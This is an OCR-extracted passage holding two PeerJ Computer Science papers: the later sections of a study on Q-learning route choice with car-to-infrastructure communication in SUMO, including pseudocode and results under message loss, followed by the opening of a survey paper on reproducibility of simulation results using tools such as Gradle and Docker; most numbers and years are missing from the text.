this scheme approaches either systems such as traffic apps we see nowadays (waze, etc.), or messages distributed by the traffic authority (as it used to be the case some time ago, using radio or variable message panels on main roads as in wahle et al. ( )). neither vehicular communication nor broadcast are appropriate to investigate the impact of sharing local information, as we do here. a previous work by us (santos & bazzan, ) has presented preliminary results about the performance of combining rl with c i against rl without communication. however, in this work, it is assumed that messages exchanged among the various actors do not get lost, which is irrealistic. therefore, in the present article we focus on the impact of communication failure and also on what type of information yields better results. in a different perspective, works such as yu, han & ochieng ( ) evaluate the impact of incomplete information sharing in the tap. they do not employ a rl-based but rather a classical approach, namely multinomial logit model. more recently, bazzan & klügl ( ) discuss the effects of a travel app, in which driver agents share their experiences. the idea is to “mimic” what happens in an office where colleagues chat about their habits and route choice experiences. in the present article, driver agents do not directly share their experiences since the work in bazzan & klügl ( ) has shown that this process may lead to sub-optimal results, due to agents not taking local issues into account. this is hardly possible in that work since bazzan & klügl ( ) use a macroscopic simulator, where location is an abstract concept. rather, the present paper proposes—as shown in the “methods”—that the information is exchanged via an intersection manager, that is, a manager of a portion of the network. in any case, this sharing of knowledge was proposed in other scenarios (tan, ) and refers generally to the research on transfer learning (taylor et al., ; torrey & taylor, ; fachantidis, taylor & vlahavas, ; zimmer, viappiani & weng, ). it is important to note though, that virtually all these works deal with cooperative environments, where it makes sense to transfer knowledge. in non-cooperative learning tasks, as it is the case of route choice, naive transfer of learned policies may lead to every agent behaving the same, which runs against the notion of efficient distribution of agents in the road network. methods our approach is based on using communication to augment the information each agent has and, hence, the learning performance. the next three subsections discuss, respectively: how the infrastructure is represented; how communication occurs; and the details of the rl algorithm. we then formalize the details as an algorithm. henceforth, the term agent is used to refer to a vehicle and/or driver agent. dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ representing the infrastructure we assume that every node n ∈ n present in the network g is equipped with a communication device (henceforth, commdev) that is able to send and receive messages in a short range signal (e.g., with vehicles around the intersection). figure shows an scheme that represents g and commdevs within g. using the short-range signal, the commdevs are able to communicate with vehicles that are close enough, and are able to exchange information related to local traffic data (refer to next section for details). 
moreover, these commdevs are able to store the data exchanged with the agents in order to propagate this information to other agents that may use nearby intersections in the near future. the arrows that connect commdevs in fig. represent a planar graph, meaning that every commdev is connected and can communicate to its neighboring devices. this permits that commdevs get information about the traffic situation in neighboring edges, which is then passed to the agents. how communication works every time an agent reaches an intersection, prior to choosing an action (the next intersection to visit), it communicates with the intersection’s commdev (see fig. ) to exchange information. the actual piece of information sent from agents to commdevs is travel times (hence, rewards) received by the agents, regarding their last action performed. conversely, the infrastructure communicates to the agent information about the state of the nearby edges, in terms of which rewards an agent can expect if it selects to use that particular link. this information can be of various forms. in all cases, the expected figure scheme of the communication infrastructure. this figure was designed using assets from https://www.vectorportal.com/ and https://www.freepik.com. all assets used fall under license cc by . . full-size doi: . /peerj-cs. /fig- dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / https://www.vectorportal.com/ https://www.freepik.com http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reward is computed by taking into account the rewards informed by other agents, when they have used nearby links. in the experiments, we show results where commdevs communicate expected rewards that are either an aggregation (over a time window) or just a single value. in any of these cases, an agent receiving such information will then take it into account when selecting an action (choice of a link) in that particular state (a node). next, details about how the information is processed, by both the commdevs and the vehicle agents, are given. information hold by infrastructure each commdev uses queue based data structures to hold the rewards informed by each agent that passes through it. specifically, each edge is associated with one data queue. these queues have a maximum size, and when new information arrives after the queue is full, the oldest reward stored is discarded to make room to the most recent one. when an agent requests information, the commdev retrieves the rewards collected for the agent’s possible actions and passes it to that agent. recall that an action corresponds to a link to be traveled next, in order to form a route to the agent’s destination. information used by the agent in a standard q-learning algorithm, the agents update their q-values based on the feedback from the action they have just taken. however, in our case agents also update their q-values based on the expected rewards received by the infrastructure. this means that every time they reach an intersection, they update their q-values with the information provided by the commdevs. we do this in order to accelerate the learning process. instead of just considering its own past experiences, the information provided by the commdevs augment the knowledge each agent has. 
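the queue-based storage just described can be sketched as follows. this is an illustrative python sketch: the class and method names, the maximum queue size, and the use of a plain average as the "expected reward" are assumptions made for readability rather than the exact implementation.

```python
from collections import deque

class CommDev:
    """communication device at one intersection: one bounded reward queue per
    outgoing edge, following the description in 'information hold by infrastructure'."""

    def __init__(self, outgoing_edges, max_size=10):
        # max_size is a placeholder; the actual maximum queue length is a parameter
        # of the experiments and is not reproduced here
        self.queues = {edge: deque(maxlen=max_size) for edge in outgoing_edges}

    def update_queue(self, reward, edge):
        # a full queue discards its oldest entry automatically (deque with maxlen)
        self.queues[edge].append(reward)

    def info(self):
        # expected reward per nearby edge; here a plain average over the stored
        # values, i.e. one of the aggregation forms mentioned in the text
        return {edge: sum(q) / len(q) for edge, q in self.queues.items() if q}
```

a commdev of this kind would be attached to every node of the network, and the rewards it stores are the (negative) travel times informed by the agents, as defined above.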
it is worth noting that a distinguishing characteristic of our approach is that it deals with local information, thus the information received from the commdev only concerns actions that can be selected from that particular node. given a network g, every agent (vehicle) v ∈ v has a pair (o, d) ∈ n × n, that defines its origin-destination pair (od-pair). nodes n ∈ n are seen as states the agents might be in, and the outgoing edges of a node n are the possible actions for that given state. hence, the agents build their routes on-the-fly by visiting nodes and edges. upon choosing an action (edge) e, v perceives its reward. we recall that being a microscopic model, this reward is actually computed by the simulator, rather than by an abstract cost function, as it would be the case in a macroscopic model. assuming that the simulator reports a travel time of tve for agent v traveling on edge e, the reward is −tve, as we want to make sure the agents prefer to take edges that minimize travel times. this alone does not guarantee that the agents will reach their destination fast, as they might end up running in loops throughout the network. hence a positive bonus b is given to each agent that reaches its destination, giving them incentives to end their trips as fast as possible. dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we deal with a commuting scenario, where each agent performs day-to-day experiments in order to reach an equilibrium situation, in which no agent can reduce its travel time by changing routes. because agents belong to different od pairs and/or select different routes, their trips take different number of simulation steps. these steps represent elapsed seconds in simulation time. hence, this means that not every agent finishes its trip simultaneously and, therefore, the standard notion of a learning episode cannot be used here. rather, each agent has its own learning episode that will take as many simulation steps as necessary to reach its destination. next, we explain the main parts of our approach, which can be seen in algorithm . line list the inputs of algorithm : g is the topology of the network, d is the demand (flow rate) that is inserted in the network, p is the set of od-pairs, and m is the maximum number of steps to simulate. it is also necessary to set α, γ (both relating to eq. ( )), ε for controlling the action selection and the exploration-exploitation strategy, and the bonus b. the main loop is presented between lines and , where the learning and the communication actually take place. the first if statement shown in line takes care of all agents that finished their trips in the current step: agents perceive their reward plus the bonus for finishing the trip. at line , each agent informs the corresponding commdevs the rewards, and since its trip has ended, it gets reinserted at the origin node to start a new learning episode (as this is a commuting scenario). the if statement at line represents the intermediary nodes, where each agent also perceives its reward and informs the commdev (line ) about the reward just algorithm q-learning with c i. : input: g, d, p, m, α, γ, ε, b : s← : while s < m do : for v in v do : if v. 
f inished_trip() then : v.update_q_table(b−v.last_edge_travel_time) : g.commdev[v.curr_node].update_queue(v.last_reward, v.last_edge) : v.start_new_commuting_trip() : else if v.has_reached_a_node() then : v.update_q_table(−v.last_edge_travel_time) : g.commdev[v.curr_node].update_queue(v.last_reward, v.last_edge) : v.update_q_values(g.commdev[v.curr_node].in f o) : v.choose_action() : end if : end for : s←s+ : end while dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experienced, so that the commdev can update its queue structure. in line , each agent updates its q-value for the last action based on its own experience, that is, with the actual reward received for traveling through the last link. following, a commdev also informs agents about the rewards that can be expected from the actions each agent might take next (line ). each agent then updates its q-table and chooses an action. experiments, results, and analysis scenario: network and demand simulations were performed using a microscopic tool called simulation of urban mobility (sumo, lopez et al. ( )). sumo’s api was used to allow vehicle agents to interact with the simulator en route, that is, during simulation time. the scenario chosen is a × grid depicted in fig. ; each line in the figure represents bi-directed edges containing two lanes, one for each traffic direction. it is also worth noting that each directed edge is m long. the demand was set to maintain the network populated at around – % of its maximum capacity, which is considered a medium to high density. recall that no real-world network is fully occupied at all times, and that the just mentioned density level does not mean that there will not be edges fully occupied, which happens from time to time; this percentage is just the average over all edges. this demand was then distributed between the od-pairs as represented in table . the last column represents the volume of vehicles per od-pair. those values were selected so that the shorter the path, the smaller the demand, which seems to be a more realistic assumption than a uniform distribution of the demand. a a a a a b b b b b c c c c c d d d d d e e e e e left left left left left right right right right right bottom bottom bottom bottom bottom top top top top top figure × grid network. full-size doi: . /peerj-cs. /fig- dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ two points are worth reinforcing here. first, vehicles get reinserted at their corresponding origin nodes, so that we are able to keep a roughly constant insertion rate of vehicles in the network, per od pair. however, this does not mean that the flow per link is constant, since the choice of which link to take varies a lot from vehicle to vehicle, and from time to time. second, despite being a synthetic grid network, it is not trivial, since it has od pairs, which makes the problem complex as routes from each od pair are coupled with others. as seen in table , we have also increased such coupling by designing the od pairs so that all routes traverse the network, thus increasing the demand for using the central links. 
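putting the pieces together, the main loop of algorithm (q-learning with c i) presented above can be rendered schematically as below. the qlearner class implements the update of eq. ( ) and the ε-greedy rule, commdev refers to the sketch given earlier, and the sim object stands in for the sumo interface. all helper names, default parameter values, and the rule used to blend the commdev information into the q-table are illustrative assumptions, not the code used in the experiments.

```python
import random
from collections import defaultdict

class QLearner:
    """tabular q-learner: update of eq. ( ) plus epsilon-greedy action selection."""

    def __init__(self, actions_per_state, alpha=0.5, gamma=0.9, epsilon=0.05):
        # alpha, gamma, epsilon and the dict-based q-table are illustrative choices,
        # not the values/structures tuned in the paper
        self.actions = actions_per_state              # node -> outgoing edges (actions)
        self.alpha, self.gamma, self.epsilon = alpha, gamma, epsilon
        self.q = defaultdict(float)                   # (node, edge) -> q-value

    def choose_action(self, node):
        if random.random() < self.epsilon:            # explore
            return random.choice(self.actions[node])
        return max(self.actions[node], key=lambda e: self.q[(node, e)])  # exploit

    def update(self, node, edge, reward, next_node):
        # q(s,a) <- q(s,a) + alpha * (r + gamma * max_a' q(s',a') - q(s,a))
        best_next = max((self.q[(next_node, e)]
                         for e in self.actions.get(next_node, [])), default=0.0)
        self.q[(node, edge)] += self.alpha * (
            reward + self.gamma * best_next - self.q[(node, edge)])

    def absorb_expected_rewards(self, node, expected):
        # blend the expected rewards received from the commdev into the q-table;
        # the exact blending rule is not prescribed in the text, this is one option
        for edge, r in expected.items():
            self.q[(node, edge)] += self.alpha * (r - self.q[(node, edge)])


def run(sim, vehicles, commdev, max_steps, bonus):
    """schematic main loop of algorithm (q-learning with car-to-infrastructure
    exchange); sim, vehicle attributes and helper names are stand-ins."""
    step = 0
    while step < max_steps:
        for v in vehicles:
            if sim.finished_trip(v):
                tt = sim.last_edge_travel_time(v)
                v.learner.update(v.prev_node, v.last_edge, bonus - tt, v.curr_node)
                # share the plain travel-time reward with the local commdev
                commdev[v.curr_node].update_queue(-tt, v.last_edge)
                sim.start_new_commuting_trip(v)       # commuting: re-insert at origin
            elif sim.reached_a_node(v):
                tt = sim.last_edge_travel_time(v)
                v.learner.update(v.prev_node, v.last_edge, -tt, v.curr_node)
                commdev[v.curr_node].update_queue(-tt, v.last_edge)
                # augment own experience with the locally shared expected rewards
                v.learner.absorb_expected_rewards(v.curr_node,
                                                  commdev[v.curr_node].info())
                sim.set_next_edge(v, v.learner.choose_action(v.curr_node))
        step += 1
        sim.advance_one_step()                        # one simulation step (roughly 1 s)
```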
q-learning parameters a study conducted by bazzan & grunitzki ( ) shows that, in an en route trip building approach, the learning rate a does not play a major role, while the discount factor γ usually needs to be high in discounted future rewards, as it is the case here. thus a value of a = . suits our needs. we remark however that we have also played with this parameter. as for the discount factor γ, we have performed extensive tests and found that a value of γ = . performs best. for the epsilon-greedy action selection, empirical analysis pointed to using a fixed value of ε = . . this guarantees that the agents will mostly take a greedy action (as they only have a % chance to make a non-greedy choice), and also take into account that the future rewards have a considerable amount of influence in the agent’s current choice, since γ has a high value. for the bonus at the end of each trip, after tests, a value of b = , was used. recall that this bonus aims at compensating the agent for selecting a jammed link, if it is close to its destination, rather than trying out detours via a link that, locally, seems less congested, but that will lead the agent to wander around, rather than directly go to its destination. we remark that trips take a rough average of time steps thus this value of b fits the magnitude of the rewards. performance metric and results while each agent perceives its own travel time, both after traversing each link, and after finishing its trip, we need an overall performance to assess the quality of the proposed table demand per od-pair. origin destination demand bottom top bottom top bottom top bottom top left right left right left right left right dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ method. for this, we use a moving average (over time steps) of the complete route travel time, for each agent that has finished its trip. given the probabilistic nature of the process, it is necessary to run repetitions of simulations. thus, runs were performed. plots shown ahead thus depict the average and the standard deviations. in order to evaluate how the communication affects the learning process, some different policies and comparisons were performed, these different methods are described in the following sections. ql with c i vs dynamic user assignment for sake of contrasting with a classical approach, fig. shows a comparison between our ql with c i approach and a method called dynamic user assignment (dua), which is an iteractive method implemented by the sumo developers. we remark that dua is a centralized, not based on rl approach. dynamic user assignment works as follows: it performs iterative assignment of pre-computed, full routes to the given od-pairs in order to find the ue . in our tests, dua was run for iterations. note that a dua iteration corresponds to a trip, and a new iteration only starts when all trips have reached their respective destinations. the output of dua is a route that is then followed by each vehicle, without en route changes. since dua also has a stochastic nature, our results correspond to repetitions of dua as well. figure shows that, obviously, at the beginning, the performance of our approach reflects the fact that the agents are still exploring, whereas dua has a better performance since a central authority determines which route each agent should take. 
this is possible since this central authority holds all the information, which is not the case in the marl based approach, where each agent has to explore in order to gain information. in our approach, after a certain time, the agents have learned a policy to map states to action and, by using it, they are able to reduce their travel times. figure ql with c i vs dua. full-size doi: . /peerj-cs. /fig- for details on how the dua method is made the reader may refer to https:// sumo.dlr.de/docs/demand/dynamic_ user_assignment.html. dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://sumo.dlr.de/docs/demand/dynamic_user_assignment.html https://sumo.dlr.de/docs/demand/dynamic_user_assignment.html https://sumo.dlr.de/docs/demand/dynamic_user_assignment.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ before discussing the actual results, we remark that a sumo time step corresponds roughly to one second. our experiments were run for about , time steps. a learning episode comprehends hundreds of time steps, as the agent has to travel from its origin to its destination. in short, a learning episode is not the same as a simulation time step. given that the agents re-start their trips immediately, different agents have different lengths for their respective learning episodes, thus the learning process is non-synchronous. using our approach, on average, an episode takes roughly time steps, thus agent reach the user equilibrium in about episodes. for rl standards, this is a fast learning process, especially considering that we deal with a highly non-stationary environment, where agents get noisy signals. however, we also remark that, for practical purposes, the policy can be learned off-line, and, later, embedded in the vehicle. to give a specific picture, table shows the actual travel times after time step , . we remark that we could have measured roughly the same around step , . it can be seen that our approach outperforms dua shortly after time step , . also noteworthy is the fact that, at any time step, agents still explore with probability ε = % thus there is room for improvements if other forms of action selection are used. ql with c i vs ql without communication our approach is also compared to standard q-learning, thus without communication, which means that the agents learn their routes only by their own previous experiences, without any augmented knowledge regarding the traffic situation and the experiences of other agents. in fig. , we can divide the learning process in both cases shown in fig. in two distinct phases: the exploration phase, where the agents have yet no information about the network and explore it to find their destination “that is when the spikes in the learning curves can be seen”; and the exploitation phase, when agents know the best actions to take in order to experience the lowest travel time possible. both approaches converge to the same average travel times in the exploitation phase. however, the advantage of our approach comes in the exploration phase. as we see in fig. , the exploration phase in the ql with c i algorithm is reduced by a considerable amount when compared to the traditional ql algorithm, meaning that in our case the user equilibrium is reached earlier. table compares the travel time measured in both cases at the time step , , when our approach has already converged, but the standard q-learning has not. 
communication success rate in the real world, it might be the case that some information gets lost due to failure in the communication devices. in order to test what happens when not all messages reach the table travel time measured for dua and ql with c i at time step , . method travel time at step k dua ≈ ql with c i ≈ dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ recipient, a success rate was implemented to test how the our approach performs if communication does not work as designed. specifically, every time an agent needs to communicate with the infrastructure, the message will reach the destination with a given success rate. this was implemented by means of a randomly generated value, which is then compared to the success rate to determine whether or not the simulator should ignore the message, thus being a metaphor for a non-delivered message. such a scheme is applied to any kind of communication between the infrastructure and the agent, that is, regardless if it is from an agent to a commdev, or vice-versa. if a message is lost, then: (i) a commdev does not get to update its data structure, and (ii) an agent does not get to update its q-table. other than that, the method behaves exactly as described by algorithm . experiments were performed varying the target success rate. for clarity, we show the results in two plots. figure compares the approach when the success rate is with % (thus the performance already discussed regarding the two previous figures), to one where the communication succeeds in only % of the times. in fig. , we depict the cases for success rate of % and %. for specific values, table lists the average travel times for all these cases at time step , , since at that time the learning processes have nearly converged. figure ql with c i vs ql without communication. full-size doi: . /peerj-cs. /fig- table travel time measured for ql and ql with c i at time step , . method travel time at step k ql ≈ ql with c i ≈ dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it is remarkable that the system not only tolerates some loss of information, but also performs slightly better when the success rate is % or even %. if one compares this case to the one in which % of the messages reach their destinations, one sees that the learning process is accelerated if agents do not have the very same information that other agents also receive. this is no surprise, as pointed out in the literature on the disadvantages of giving the same information to everyone. what is novel here is the fact that we can show that this is also the case when information is shared only at local level, as figure ql with c i: comparison between % and % success rate. full-size doi: . /peerj-cs. /fig- figure ql with c i: comparison between % and % success rate. full-size doi: . /peerj-cs. /fig- dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ well as when the communication is between vehicles and the infrastructure, not among all vehicles themselves. 
as expected, when we look at the case with a low success rate of %, we observe several drawbacks since the communication rate is getting closer to no communication at all: (i) the average travel time increases, (ii) the learning process takes longer, and (iii) the standard deviation also increases (meaning that different trips may take very different travel times and, possibly, different routes). different strategies for storing information at the infrastructure apart from investigating what happens when information is lost, we also change the way commdevs compute and share the reward information to the driver agents. here the main motivation was to test what happens when the infrastructure is constrained by a simpler type of hardware, namely one that can store much less information (recall that the original approach is based on a queue-like data structure). to this aim, we conducted experiments in which the goal was to test which type of information is best for the infrastructure to hold and pass on to the agents. we have devised three ways to do this: (i) the infrastructure only holds and informs the highest travel time (hence the most negative reward) value to the agents; (ii) the infrastructure informs the lowest reward (hence the least negative) to the agents; (iii) the infrastructure holds only the latest (most recent) travel time value received. note that, in all these cases, the infrastructure only needs to store a single value, as opposed to the case in which the infrastructure stores a queue of values in order to compute a moving average. figure shows a comparison between the different policies. for clarity, we omit the deviations but note that they are in the same order as the previous ones. the best case seems to be associated with the use of the most recent travel time information, as seen both in fig. and table . communicating the lowest travel time might look good at first sight. but it has as drawback that this leads all agents to a act greedly and thus using the option with least travel time. this ends up not being efficient as seen in fig. . conversely, communicating the highest travel time is motivated by the fact that the infrastructure might want to distribute the agents among the options available, thus communicating a high travel time leads to not all agents considering it: since some would have experienced a better option before and hence have this knowledge in their q-tables, they will not use the information received. this proves to be the second best strategy, only behind the aforementioned strategy on communicating the latest information. the reason for the good performance of the latter is the fact that the latest table travel time measured for each success rate at time step , . success rate (%) travel time at step k ≈ ≈ ≈ ≈ dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ information is diverse enough (i.e., varies from recipient agent to agent) so that it also guarantees a certain level of diversity in the action selection, thus contributing to a more even distribution of routes. conclusions and future work a wise route choice is turning more and more important when the demand is increasing and road networks are not being expanded in the same proportion. marl is an attractive method for letting agents autonomously learn how to construct routes while they are traveling from a to b. this article presented a method that combines marl with c i communication. 
vehicles interact with the infrastructure every time they reach an intersection. while they communicate the travel times they have experienced in nearby links, they also receive the expect travel times regarding their next possible link choices. we have extended a previous approach by relaxing the assumption that all messages are sent and received, that is, there is no loss of messages. to the best of our knowledge, this is a novel investigation to scenarios dealing with learning based route choice, where the there is a sharing of local information via c i. figure ql with c i with different strategies. full-size doi: . /peerj-cs. /fig- table travel time measured for each strategy at time step , . strategy travel time at step k highest travel time ≈ latest travel time ≈ lowest travel time ≈ ql with c i ≈ dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this work thus has the following contributions: we employ marl to the task of learning; we do this using a non trivial scenario with more than one origin-destination pair; we depart from the assumption that driver agents already know a set of (pre-computed) routes to select among; we use a microscopic, agent-based approach; we connect marl with new communication technologies, in order to investigate whether the learning process can be accelerated. also, we have employed our method to test some real-world situations that may arise, namely communication loses and the need to use simpler hardware devices to store information by the infrastructure. our results show that, before deploying c i communication in the real-world, one has to take into account the various effects of sharing information, even at local level. we were able to show that one has to strive to communicate information that is diverse enough, in order to avoid sub-optimal route choices, that is, those that are made by drivers having similar information. as these drivers tend to act greedly, a wise strategy on sharing information is key. specifically, our results point out to our approach being tolerant to information loses; further, there was even a slight improvement in the overall performance (i.e., learning speed) since less information also mean that not all agents will act the same way. as for the different strategies regarding storage of information in the infrastructure, we could show that communicating only the latest known travel time is able to speed up the learning process. we remark that in all cases we have tested, marl was able to reach the user equilibrium. the major difference is the speed of such process. for future work, one possible investigation is the addition of a biased information provided by the infrastructure in order to reach a different outcome, namely, to reach the system optimum (socially efficient distribution of routes to vehicles), rather than converging to the user equilibrium. we also plan to change the demand during simulation time, to check how the learners deal with such changes. preliminary work on using q-learning in such dynamic environments point out that it is able to handle different situations. however, it remains to be investigated whether this is also the case for changes in flow rates. moreover, we would like to study whether the proposed combination of q-learning with c i is able to speed up the learning processes as much as it was the case in the present work. 
additional information and declarations funding this work was supported by cnpq under grant no. / - (ana bazzan), by capes (coordenação de aperfeiçoamento de pessoal de nível superior—brazil, finance code ), and by a fapergs grant (guilherme d. dos santos). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant disclosures the following grant information was disclosed by the authors: cnpq: / - . capes (coordenação de aperfeiçoamento de pessoal de nível superior—brazil): . fapergs. competing interests the authors declare that they have no competing interests. author contributions � guilherme dytz dos santos conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � ana l.c. bazzan conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code is available at github: https://github.com/guidytz/sumo-ql. references auld j, verbas o, stinson m. . agent-based dynamic traffic assignment with information mixing. procedia computer science ( ): – doi . /j.procs. . . . bazzan alc, fehler m, klügl f. . learning to coordinate in a network of social drivers: the role of information. in: tuyls k, hoen pj, verbeeck k, sen s, eds. proceedings of the international workshop on learning and adaptation in mas (lamas ), number in lecture notes in artificial intelligence. – . bazzan alc, grunitzki r. . a multiagent reinforcement learning approach to en-route trip building. in: international joint conference on neural networks (ijcnn), – . bazzan alc, klügl f. . experience sharing in a traffic scenario. in: proceedings of the th international workshop on agents in traffic and transportation, santiago de compostella. buriol ls, hirsh mj, pardalos pm, querido t, resende mg, ritt m. . a biased random-key genetic algorithm for road congestion minimization. optimization letters ( ): – doi . /s - - - . fachantidis a, taylor me, vlahavas ip. . learning to teach reinforcement learning agents. machine learning and knowledge extraction ( ): – doi . /make . grunitzki r, bazzan alc. . combining car-to-infrastructure communication and multi-agent reinforcement learning in route choice. in: bazzan alc, klügl f, ossowski s, vizzari g, eds. proceedings of the ninth workshop on agents in traffic and transportation (att- ). new york: ceur-ws.org. grunitzki r, bazzan alc. . comparing two multiagent reinforcement learning approaches for the traffic assignment problem. in: brazilian conference on intelligent systems (bracis). koster a, tettamanzi a, bazzan alc, pereira cdc. . using trust and possibilistic reasoning to deal with untrustworthy communication in vanets. in: proceedings of the th ieee dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/guidytz/sumo-ql http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /make http://dx.doi.org/ . /peerj-cs. 
making simulation results reproducible—survey, guidelines, and examples based on gradle and docker
wilfried elmenreich, philipp moll, sebastian theuermann and mathias lux, universität klagenfurt, klagenfurt, austria
abstract: this article addresses two research questions related to reproducibility within the context of research related to computer science. first, a survey on reproducibility addressed to researchers in the academic and private sectors is described and evaluated. the survey indicates a strong need for open and easily accessible results; in particular, reproducing an experiment should not require too much effort. the results of the survey are then used to formulate guidelines for making research results reproducible. in addition, this article explores four approaches based on software tools that could bring forward reproducibility in research results. after a general analysis of tools, three examples are further investigated based on actual research projects which are used to evaluate previously introduced tools. results indicate that the evaluated tools contribute well to making simulation results reproducible but, due to conflicting requirements, none of the presented solutions fulfills all intended goals perfectly.
subjects: data science, scientific computing and simulation, software engineering
keywords: in-silico research, reproducibility, simulation
introduction
reproducibility of experimental results is fundamental in all scientific disciplines. reproducing results of published experiments, however, is often a cumbersome and unrewarding task. casadevall & fang ( ) report that some fields, for example biology, are concerned with complex and chaotic systems which are difficult to reproduce. at the same time, we would expect digital software-based experiments to be easily reproducible, because digital data can be easily provided and computer algorithms on these data are typically well-described and deterministic. however, this is often not the case due to a lack of disclosure of relevant software and data that would be necessary to reproduce results. ongoing open science initiatives aim to have researchers provide access to data and software together with their publications in order to allow reviewers to make well-informed decisions and to provide other researchers with the information and necessary means to build upon and extend original research (ram, ). this article addresses two research questions (rq) related to reproducibility: rq "to what extent is reproducibility of results based on software artifacts important in the field of computer science and in related research areas?" rq "what tools can be used to support reproducibility?"
how to cite this article: elmenreich w, moll p, theuermann s, lux m. making simulation results reproducible—survey, guidelines, and examples based on gradle and docker. peerj comput. sci. submitted june, accepted november, published december. corresponding author: wilfried elmenreich, wilfried.elmenreich@aau.at. academic editor: philipp leitner. additional information and declarations can be found on page . copyright elmenreich et al., distributed under creative commons cc-by.
http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ rq addresses the aspects of the relevance of reproducibility to a researcher’s field, willingness to contribute to making one’s own work reproducible, and possible concerns. an online survey was designed to assess the current practice, subject awareness, and possible concerns. the focus of the survey was on the disciplines computer science, computer engineering, and electrical engineering and it addressed researchers at different positions in universities, research institutions, and companies. to answer rq , we present three examples where three different types of software projects are packaged to provide an accurate and easy possibility for reproducing results in a controlled environment and analyze how these solutions address the requirements derived from the survey. the responses to our online survey confirm our initial assumption that the reproducibility of research results is an important concern in computer science research. one of the researchers’ main reasons for publishing software artifacts along with scientific publications is improved credibility and reliability of results. based on the survey’s results presented in the section “survey”, we infer requirements and general guidelines assisting researchers in making their research reproducible in the section “requirements and general guidelines”. finally, we discuss how different tools comply with the created requirements and guidelines. we find that due to conflicting requirements, none of the presented solutions fulfills all intended goals perfectly. one of the most pressing challenges is to achieve long term availability of results while respecting licensing issues of required third-party dependencies. an in-depth discussion of open issues is elaborated in the section “one tool to reproduce them all?” and we conclude the article and highlight our major findings in the section “conclusion”. related work walters ( ) notes that it is often difficult to reproduce the work described in molecular modeling and chemoinformatics papers. for the most part this is due to the absence of a disclosure requirement in many scientific publication venues thus far. morin et al. ( ) report that in only three of the most cited journals had editorial policies requiring availability of source code after publication. fortunately, this situation is changing for the better, for example science introduced a policy requiring authors to make data and code related to their publication available whenever possible (witten & tibshirani, ; peng, ; hanson, sugden & alberts, ). commenting on this policy, shrader- frechette & oreskes ( ) brought up the issue that although privately funded science may be of high quality, it is not subject to the same requirements for transparency as publicly funded science. another obstacle is the use of closed-source tools and undisclosed software results in publicly funded research software development projects as discussed by morin et al. ( ). vitek & kalibera ( ) address the topic of repeatability and reproducibility for systems research and identify a particular difficulty for embedded systems due to companies being reluctant to release code and that implementations are often bound to specific hardware. 
focusing on the current state of reproducibility, acm sigcomm computer communication review (ccr) conducted a survey on reproducibility with responses from authors of papers published in ccr and the sigcomm sponsored conferences elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (bonaventure, ). the responses showed that there is a good awareness of the need for reproducibility and a majority of authors either considered their paper self-contained or have released the software used to perform experiments. however, there were only few releases of experimental data or of modifications of existing open source software. the open question part of the survey indicated a need for encouragement for publishing reproducible work or for papers that attempt to reproduce or refute earlier results. flittner et al. ( ) conducted an analysis of papers from four different acm conferences held in . this study found that the type of artifacts can differ significantly between different communities. the analysis further indicates that even if researchers state that their work is reproducible, the majority of analyzed papers do not provide the complete toolset to reproduce all results. most importantly, the study shows that published artifacts are indeed reused, which is why the authors encourage others to release artifacts. a critical aspect when releasing artifacts is to decide on tools supporting researchers in the process of making research reproducible. several papers report on case studies for data repositories in the context of reproducibility including fields such as geographic information systems (steiniger & hunter, ), astrophysics (allen & schmidt, ), microbiome census (mcmurdie & holmes, ), and neuroimaging (poline et al., ). these examples are promising, but it cannot be expected that the approaches are going to be used beyond the field they have been introduced. simflowny (arbona et al., ) is a platform for formalizing and managing the main elements of a simulation flow, tied not to a field, but to a specified simulation architecture. the whole tale approach (brinckman et al., ) aims at linking data, code, and digital scholarly objects to publications and integrating all parts of the research story. other works focus on code and data management, such as ram ( ) suggesting very general version control systems such as git for transparent data management in order to enable reproducibility of scientific work. the care approach (janin, vincent & duraffort, ) extends the archiving 